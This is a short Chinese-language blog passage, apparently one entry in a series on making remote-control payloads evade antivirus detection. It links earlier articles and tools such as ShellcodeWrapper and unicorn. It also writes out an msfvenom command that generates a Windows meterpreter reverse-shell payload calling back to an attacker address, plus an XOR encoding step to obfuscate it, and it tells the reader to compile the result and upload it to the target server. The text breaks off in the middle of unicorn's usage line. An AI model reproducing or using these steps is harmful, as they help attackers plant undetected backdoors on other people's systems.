venom

本专题文章导航 1、远控免杀专题(1)-基础篇： https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2、远控免杀专题(2)-msfvenom隐藏的参数： https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w 3、远控免杀专题(3)-msf自带免杀(VT免杀率35/69)： https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA 4、远控免杀专题(4)-Evasion模块(VT免杀率12/71)： https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ 5、远控免杀专题(5)-Veil免杀(VT免杀率23/71): https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw 6、远控免杀专题(6)-Venom免杀(VT免杀率11/71): https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ 7、远控免杀专题(7)-Shellter免杀(VT免杀率7/69)：本文 文章打包下载及相关软件下载： https://github.com/TideSec/BypassAntiVirus 免杀能力一览表 几点说明： 1

工具免杀 选择了几个简单或者近期还有更新的免杀工具进行学习 ShellcodeWrapper 项目地址 https://github.com/Arno0x/ShellcodeWrapper 该工具的原理是使用异或加密或者aes加密，做到混淆，进行免杀。 先使用msfvenom生成raw格式文件 msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f raw -o shellcode.raw 下面命令 mi0 是密码随意写即可。 python shellcode_encoder.py -cpp -cs -py payload/shellcode.raw mi0 xor 会生成3个文件，用C++编译的cpp文件，用python编译的py文件和用c#编译的cs文件 直接丢到vs中把cpp编译生成exe文件即可，上传目标服务器。 unicorn 项目地址 https://github.com/trustedsec/unicorn.git 从github上下载下来就可以运行，使用方法非常简单 支持生成ps1、macro、hta、dde等形式的代码和文件 所有类型的使用方法如下 Usage: python unicorn.py payload reverse_ipaddr